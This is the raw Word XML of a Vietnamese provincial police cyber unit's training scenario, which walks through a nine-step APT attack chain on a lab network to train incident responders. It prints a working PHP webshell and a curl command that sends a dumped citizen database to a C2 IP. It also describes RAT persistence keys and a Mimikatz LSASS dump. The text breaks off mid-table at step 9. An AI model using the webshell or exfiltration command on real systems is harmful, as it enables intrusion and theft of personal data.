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F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PHÒNG AN NINH MẠNG VÀ PCTP SỬ DỤNG CÔNG NGHỆ CAO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CÔNG AN TỈNH QUẢNG NINH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TÀI LIỆU MÔ PHỎNG KỊCH BẢN TẤN CÔNG MẠNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kịch bản A — APT Kill Chain (9 bước): Spear Phishing → Execution → Persistence → Credential Access → Discovery → Lateral Movement → Collection → Exfiltration → Cover Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="C00000"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phục vụ công tác huấn luyện, diễn tập và nâng cao năng lực ứng phó sự cố an ninh mạng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>I. MỤC ĐÍCH VÀ PHẠM VI ÁP DỤNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản mô phỏng này được xây dựng nhằm phục vụ công tác huấn luyện thực chiến cho cán bộ kỹ thuật thuộc đơn vị, đặc biệt trong lĩnh vực điều tra số (Digital Forensics), phân tích nhật ký hệ thống (Log Analysis) và ứng phó sự cố an ninh mạng (Incident Response). Thông qua việc tái dựng một chuỗi tấn công có chủ đích (Advanced Persistent Threat — APT) theo trình tự kỹ thuật thực tế, tài liệu này cung cấp nền tảng nhận thức để cán bộ nhận diện các Chỉ số xâm phạm (Indicators of Compromise — IoC) và truy vết hành vi tấn công trong môi trường thực thi thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Phạm vi kịch bản bao quát toàn bộ chuỗi tấn công 9 bước theo mô hình APT Kill Chain: từ giai đoạn xâm nhập ban đầu (Initial Access) thông qua kỹ thuật lừa đảo có chọn lọc (Spear Phishing), tiến tới giai đoạn thực thi mã độc (Execution), duy trì quyền kiểm soát (Persistence) thông qua Registry Run Key và Scheduled Task, đánh cắp thông tin xác thực bằng kỹ thuật dump bộ nhớ LSASS (Credential Access), do thám mạng nội bộ (Discovery), di chuyển ngang hàng vào máy chủ web qua SSH (Lateral Movement), cài cắm webshell thu thập dữ liệu (Collection), trích xuất cơ sở dữ liệu công dân quy mô lớn (Exfiltration), và cuối cùng là xóa toàn bộ dấu vết hoạt động (Cover Tracks). Chuỗi tấn công này ánh xạ trực tiếp lên khung chiến thuật MITRE ATT&amp;CK, cho phép đánh giá mức độ phủ rộng của các biện pháp phòng thủ hiện hữu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDD7EE"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>II. TỔNG QUAN CHUỖI TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chuỗi tấn công được thiết kế theo mô hình APT Kill Chain chín bước, trong đó mỗi giai đoạn có sự liên kết nhân quả chặt chẽ với giai đoạn tiếp theo. Đối tượng tấn công không thực hiện các bước đơn lẻ rời rạc mà vận hành theo một quy trình có tổ chức, tận dụng triệt để từng lỗ hổng kỹ thuật và quy trình để leo thang đặc quyền và mở rộng phạm </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>vi kiểm soát bên trong hạ tầng mục tiêu. Môi trường diễn tập bao gồm ba nút hạ tầng: CLIENT-PC (192.168.1.100 — Windows 10 Pro, tài khoản nhanvien01) là điểm xâm nhập ban đầu; WEB-SERVER (192.168.1.10 — Ubuntu 22.04, Apache2/PHP) là mục tiêu lateral movement; DB-SERVER (192.168.1.20 — Ubuntu 22.04, MySQL 8.0) là mục tiêu trích xuất dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Điểm đáng chú ý của kịch bản này nằm ở việc đối tượng hoàn toàn không khai thác các lỗ hổng zero-day hay kỹ thuật mã hóa phức tạp trong phần lớn các giai đoạn, mà chủ yếu tận dụng cấu hình bảo mật yếu, thói quen người dùng và sự thiếu hoàn thiện trong chính sách kiểm soát truy cập nội bộ — phản ánh thực trạng phổ biến tại nhiều đơn vị hành chính nhà nước hiện nay.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDD7EE"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>III. DIỄN BIẾN TỪNG BƯỚC — BẢNG TỔNG HỢP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>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2808"/>
        <w:gridCol w:w="6042"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BƯỚC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MÁY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C00000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SỰ KIỆN MÔ PHỎNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đối tượng gửi email giả mạo danh UBND tỉnh (địa chỉ tương tự chính thức, nội dung yêu cầu đọc báo cáo tài chính quý I), đính kèm file BaoCaoTaiChinh_Q1.pdf.exe — là file thực thi (PE32) được giả định dạng tài liệu PDF thông qua kỹ thuật Double Extension.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nạn nhân mở file đính kèm. Tiến trình thực thi khởi chạy Remote Access Trojan (RAT) ngầm trong nền dưới dạng tiến trình giả mạo svchost32.exe (process masquerading), thiết lập kết nối TCP ra ngoài đến địa chỉ C2 45.134.212.77 trên cổng 4444 (Metasploit Meterpreter). File PDF giả đồng thời mở ra để đánh lừa nạn nhân.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mô-đun thu thập thông tin xác thực (Credential Harvesting Module) thuộc RAT thực hiện truy vấn Windows Credential Manager thông qua API hệ thống (CredEnumerateW). Toàn bộ thông tin xác thực được lưu trữ — bao gồm mật khẩu SSH, RDP, và thông tin đăng nhập ứng dụng nội bộ — bị trích xuất và truyền về máy chủ điều khiển (C2) của đối tượng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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40" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808"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40" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Malware thiết lập cơ chế duy trì quyền kiểm soát (Persistence) theo hai vector song song: ghi Registry Run Key WindowsDefend32 tại HKLM\Software\Microsoft\Windows\CurrentVersion\Run trỏ đến %TEMP%\svchost32.exe để tự khởi động cùng Windows; đồng thời tạo Scheduled Task giả mạo tên \Microsoft\Windows\UpdateAssistant\Assistant chạy với quyền SYSTEM, tự động restart malware mỗi 5 phút nếu tiến trình bị kill.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Từ phiên C2, đối tượng leo thang đặc quyền lên SYSTEM (Named Pipe Impersonation), sau đó sử dụng module Mimikatz (load kiwi) để đọc bộ nhớ tiến trình lsass.exe và dump toàn bộ NTLM hash. Kết quả thu được bao gồm thông tin tài khoản adminIT (domain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>admin) — cho phép đối tượng truy cập toàn bộ hệ thống nội bộ qua SSH/RDP/SMB mà không cần khai thác thêm lỗ hổng nào.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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40" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808"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40" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Malware thực hiện quét toàn bộ dải mạng nội bộ /24 (192.168.1.0/24) để xác định các host đang hoạt động và các cổng dịch vụ đang mở — phát hiện WEB-SERVER (192.168.1.10) với cổng 22/80 và DB-SERVER (192.168.1.20) với cổng 3306. Hành vi TCP SYN flood từ một host đến toàn dải trong dưới 5 giây tạo ra cảnh báo severity HIGH trên hệ thống IDS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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CLIENT → WEB SERVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sử dụng thông tin xác thực tài khoản adminIT (domain admin) thu được từ bước LSASS Dump, đối tượng thiết lập phiên SSH từ CLIENT-PC (192.168.1.100) vào WEB-SERVER (192.168.1.10). Nhật ký /var/log/auth.log ghi nhận đăng nhập thành công với nguồn IP bất thường (máy trạm nhân viên thay vì máy admin 192.168.1.5), nhưng không kích hoạt cảnh báo tự động do thiếu quy tắc phát hiện trên SIEM. Dịch vụ SSH không được cấu hình xác thực đa yếu tố (MFA) là nguyên nhân trực tiếp cho phép bước tấn công này thành công.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WEB SERVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sau khi chiếm quyền truy cập SSH, đối tượng upload file webshell PHP được đặt tên ngụy trang là img_cache.php lên thư mục /var/www/html/uploads/ — thư mục dùng để lưu trữ tệp tải lên từ người dùng ứng dụng, nhưng không được cấu hình chính sách cấm thực thi file PHP. Webshell có nội dung: &lt;?php if(isset($_GET['cmd'])) { system(base64_decode($_GET['cmd'])); } ?&gt; — nhận lệnh qua parameter ?cmd= và thực thi trực tiếp trên máy chủ. Nhật ký Apache ghi nhận các request GET đến /uploads/img_cache.php?cmd= từ địa chỉ 192.168.1.100. Một khi triển khai xong, đối tượng có thể thực thi lệnh hệ thống tùy ý thông qua trình duyệt web, hoàn toàn độc lập với phiên SSH ban đầu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WEB SERVER </w:t>
            </w:r>
            <w:r w:rsidRPr="007C2626">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> DATABASE SERVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6042" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Từ giao diện webshell, đối tượng trích xuất thông tin xác thực cơ sở dữ liệu từ file cấu hình ứng dụng (config.php / .env) được lưu trên máy chủ, sau đó kết nối đến DB-SERVER (192.168.1.20) và thực hiện dump toàn bộ cơ sở dữ liệu citizens_db chứa 150.247 bản ghi thông tin công dân (họ tên, số CCCD, ngày sinh, địa chỉ, số điện thoại). Đối tượng thực thi lệnh mysqldump citizens_db &gt; /tmp/data.sql.gz (8.2MB) rồi truyền về máy chủ C2 qua lệnh curl -F "file=@/tmp/data.sql.gz" http://45.134.212.77/upload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2626" w:rsidTr="007C2626">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="932"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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280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7C2626" w:rsidRDefault="007C2626" w:rsidP="007C2626">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WEB SERVER </w:t>
            </w:r>
            <w:r w:rsidRPr="007C2626">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> DATABASE SERVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
